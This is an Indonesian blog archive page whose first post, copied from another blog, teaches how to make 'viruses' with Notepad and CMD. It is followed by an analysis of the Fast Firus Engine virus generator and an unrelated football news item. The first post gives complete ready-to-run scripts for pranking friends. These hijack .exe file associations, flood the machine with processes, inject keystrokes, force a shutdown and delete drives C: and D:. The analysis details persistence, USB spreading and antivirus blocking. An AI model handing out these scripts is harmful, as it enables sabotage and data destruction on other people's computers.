Arsip Blog

Kamis, 27 Maret 2014

Viruss

Cara Membuat Virus Menggunakan Notepad dan CMD Nah sobat kali ini saya akan share cara membuat virus menggunakan notepad dan cmd. Virus ini bisa digunakan untuk ngerjain teman dan ada juga yang cukup berbahaya sobat, saya share ini hanya sekedar ingin berbagi pengetahuan kepada sobat sekalian, siapa tau berguna dan bermanfaat bagi sobat dan supaya sobat juga tau kalau notepad dan cmd bawaan dari windows bisa digunakan untuk membuat virus. oke sobat, langsung akan saya jelaskan...



1. Saya akan menjelaskan cara membuat virus menggunakan CMD : Buka program cmd nya melalui klik start - run - ketik cmd atau bisa melalui keyboard dengan mengetik key windows + R lalu ketik cmd dan dan tekan enter lalu ketikan script berikut di cmd "ASSOC.exe=.hank" tanpa tanda petik lalu tekan enter! nah, ini membuat program/aplikasi yang berexstensi .exe tidak mau jalan, seperti game, dll. Tapi tenang, ini bisa dikembalikan seperti semuala dengan cara buka cmd nya lagi lalu ketik "ASSOC.exe=EXEFILE" trik ini bisa untuk ngerjain teman sobat, ya cuma buat iseng-iseng.




2. Sekarang saya akan menjelaskan cara membuat virus menggunakan Notepad : Buka notepad nya melalui start - all programs - accessories - notepad kemudian ketik kode script berikut ke notepad : 
------



start

start

start

start

start

start

start

start

start

start

start

start



------
Nah, selanjutnya simpan di notepad dengan nama apa saja dengan exstensi .bat contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini membuat komputer menjadi eror, karena akan membuka CMD yang banyak jika file "eror.bat" itu di buka.

3. Masih di notepad, sekarang saya akan jelaskan cara membuat notepad terbuka secara otomatis, silahkan ketik/ copas kode script berikut ke notepad :


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan di notepad dengan nama apa saja dengan exstensi .bat sama seperti yang tadi, contoh "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini akan membuat notepad terbuka dengan sendirinya secara otomatis.

4. Masih menggunakan notepad, yang sekarang cara membuat tombol backspace menjadi eror menekan terus menerus secara otomatis, langsung saja copas/ketik kode script berikut ke notepad : 

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Simpan kode script tersebut di notepad dengan nama apa saja yang penting tidak lupa menuliskan exstensi .vbs contoh : "eror.vbs" tanpa tanda kutip dan Save As Type ganti menjadi Al Files. Trik ini membuat tombol backspace menjadi eror dan menekan dengan sendiri nya.

5. Masih menggunakan notepad, trik sekarang bisa membuat CD/DVD Room buka tutup dengan sendiri nya, langsung aja copas/ketik kode script berikut ke notepad : 

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan kode tersebut di notepad dengan nama bebas dan tambahkan exstensi .vbs contoh : "eror.vbs" dan Save As Type ganti menjadi All Files, maka akan bisa membuat CD/DVD Room buka tutup dengan sendirinya secara otomatis.

6. Trik kali ini bisa membuat Caps Lock menyala terus menerus tak terkendali, langsung saja copas/ketik kode script berikut di notepad : 

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika File ini di buka akan membuat Caps Lock menyala terus menerus.

7. Trik yang ke tujuh, membuat komputer menjadi shoutdown dengan kata lain mati, langsung saja ini script nya copas ke notepad : 

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika file ini di buka akan membuat komputer shoutdown atau mati.

8.Trik yang ini sama dengan trik yang nomor 7 hanya saja yang ini isi waktu, langsung saja copas/ketik kode script berikut ke notepad : 

@echo shutdown -s -t 1 -f 

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .bat lain dengan trik yang no 7, contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files, Maka jika file ini dibuka akan sama dengan no 7 yaitu membuat komputer Shoutdown, hanya saja yang membedakan adalah yang ini berisi waktu, lihat angka pada kode script tersebut yang berwarna biru, itu adalah waktu yang dibutuhkan untuk mematikan komputer, bisa di atur sesuai keinginan (1 = 1 detik)

9. Kali ini trik yang lumayan berbahaya, karena komputer akan dipenuhi oleh 100000000  

tourstart yang akan memenuhi layar monitor dan akan membuat komputer menjadi hang,  
untuk mengatasinya dapat mendelete semua tourstart tersebut atau langsung merestart 
komputer. Silahkan copas/ketik kode script berikut ke notepad : 

option explicit 
dim wshshell 
set wshshell=wscript.createobject(“wscript.shell”) 
dim x 
for x = 1 to 100000000 
wshshell.run “tourstart.exe” 
next

Simpan dengan nama bebas dan dengan exstensi .vbs contoh : "virus.vbs" tanpa tanda kutip dan Save As type ganti menjadi All Files. Pada angka yang saya beri wara biru, itu bisa di ganti sesuai keinginan, bisa dibuat menjadi 100 atau 1000 saja, dan begitu file ini dibuka akan membuat tourstart sesuai dengan angka yang ditulis pada kode tesebut,

10. Nah Yang terakhir ini, saya rasa paling berbayaha, karena dapat menghapus seluruh data di hardisk tanpa terkecuali, sehingga mau tidak mau ya harus instal ulang, langsung saja copas/ketik kode script berikut di notepad : 

@echo off
DEL C: -Y
DEL D: -Y

Simpan dengan nama bebas dan exstensi .bat contoh "virus.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files dan simpan , tapi JANGAN DIKLIK karena bisa berakibat fatal bagi komputer anda.

Oke..itulah beberapa cara membuat virus menggunakan notepad dan cmd, agar dapat dipergunakan dengan baik, dan agar sobat dapat berhati-hati jika melihat ada file di komputer sobat yang berexstensi .bat atau .vbs siapa tau teman atau orang dekat sobat iseng-iseng ngerjain...
- See more at: http://dikaeuphrosyne.blogspot.com/2013/04/cara-membuat-virus-menggunakan-notepad.html#sthash.ejk47QiN.dpuf

Fast Firus Engine

Fast Firus Engine (FFE)
Pembuat Generator tersebut menamakan program buatannya itu dengan nama Fast Firus Engine. Seperti yang terlihat pada program ataupun situs pembuatnya, ia memberitahukan bahwa program ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk pengrusakan.
Virus Generator ini dibuat menggunakan bahasa Visual Basic dan di-compress menggunakan packer tELock. Dalam paketnya terdapat dua buah file, yakni Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe merupakan program utama dalam pembuatan virusnya dan sementara file data.ex_ sebenarnya merupakan badan virus asli yang belum dimodifi kasi.
Saat file Fast Firus Engine.exe dijalankan, maka pengguna akan dihadapkan pada sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda.
Cara kerja dari Generator tersebut sebenarnya sangat sederhana. Ia hanya menambahkan data yang Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi tersebut digunakan oleh virus dalam proses infeksi.
Bagaimana Virus Menginfeksi?
Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic yang di-compile dengan metode Native- Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes.
Saat virus kali pertama dieksekusi, ia akan membuat beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan terdapat file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus sesuai yang diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan terdapat file copy.pif, _default.pif, dan surif.bin. Selain itu, ia juga mengubah atau membuat file Oeminfo.ini yang merupakan bagian dari System Properties. Jadi apabila komputer Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan terdapat tulisan “Generated by Fast Firus Engine”.
Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa file induk lagi yang menggunakan nama yang sama seperti file system milik Windows, seperti csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe.
Dan tak lupa, pada root drive pun akan terdapat file dengan nama “baca euy.txt” yang berisikan pesan–pesan dari si pembuat virus. Jadi pada saat membuat virus dengan menggunakan Generator tersebut, maka pembuatnya akan disuguhkan beberapa kotak input, seperti Author of the virus, Name of the virus, dan Messages. Nah, isi dari kotak messages ini yang nantinya ditampilkan pada file “baca euy.txt” tersebut.
Setelah virus berhasil meng-copy-kan file induknya ke dalam sistem tersebut, ia akan menjalankan file induk tadi, sehingga pada memory akan terdapat beberapa process virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, dan winlogon.exe. Nama process yang mirip dengan process/services milik Windows tersebut mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process tersebut dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yang running biasanya berasal dari direktori System32.
Mengubah Registry
Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry yang diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi.
Yang ia ubah adalah seperti nilai dari item Userinit, yakni dengan menambahkan parameter ke file induk. Pada key HKEY_CURRENT_ USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru dengan nama present. Key HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru juga dengan nama Default dan %username%, username di sini merupakan nama user yang sedang aktif saat itu.
Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yakni dengan mengubah type information dari Application menjadi File Folder. Setting-an folder Options juga diubah agar tidak menampilkan extension dan setiap fi le dengan attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot.
Dengan menggunakan bantuan registry Image File Execution Options, virus ini juga menambahkan item baru pada section tersebut dengan nama cmd.exe, msconfi g.exe, regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user yang mengakses program dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkan ke file induk si virus.
Bagaimana Virus Menyebar?
Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk tersebut.
File virus lainnya pun disimpan pada direktori baru di flash disk tersebut dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak terlihat.
Virus Beraksi
Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah, data mengenai program apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi.
Jadi, saat virus sudah stay di memory, ia akan memonitor setiap program yang diakses oleh user, yakni dengan membaca nama file dan juga caption Window. Beberapa nama file antivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa program setup atau installer juga tidak dapat dijalankan pada komputer terinfeksi.
Pencegahan dan Penanggulangan
PC Media Antivirus RC19 ini dapat membersihkan komputer terinfeksi secara tuntas dan akurat 100% setiap virus yang dibuat dengan menggunakan Fast Firus Generator. Untuk menghindari aksi blok oleh virus terhadap PCMAV, silakan Anda rename terlebih dahulu file PCMAV misalnya PCMAV-CLN.EXE menjadi MERDEKA.EXE.

Jumat, 14 Maret 2014


Pelatih Barcelona Tata Martino begitu gembira atas kesuksesan timnya melaju ke babak delapan besar Liga Champions dengan menyingkirkan perwakilan Inggris Manchester City.

Kegembiraan Martino cukup dipahami, Barcelona meraih kemenangan setelah dibanjiri kritisi karena kekalahan mengejutkan 1-0 yang diderita dari Real Valladolid pada pertandingan sebelumnya.

"Kemenangan atas City bukan saja tentang lolos atau tidaknya Barcelona, tetapi bagaimana kami melakukannya. Performa apik tim bisa jadi modal untuk laga-laga ke depan," kata Martino dilansir Marca.

"Barcelona bisa bangkit dari keterpurukan. Kami punya harga diri yang harus dipertahankan."

"Jika saya harus memberi nasihat pada pihak yang tidak menyukai Barcelona, saya akan meminta mereka untuk tenang, karena kecaman, kritisi hanya akan membakar semangat kami," tandasnya.
Ada kesalahan di dalam gadget ini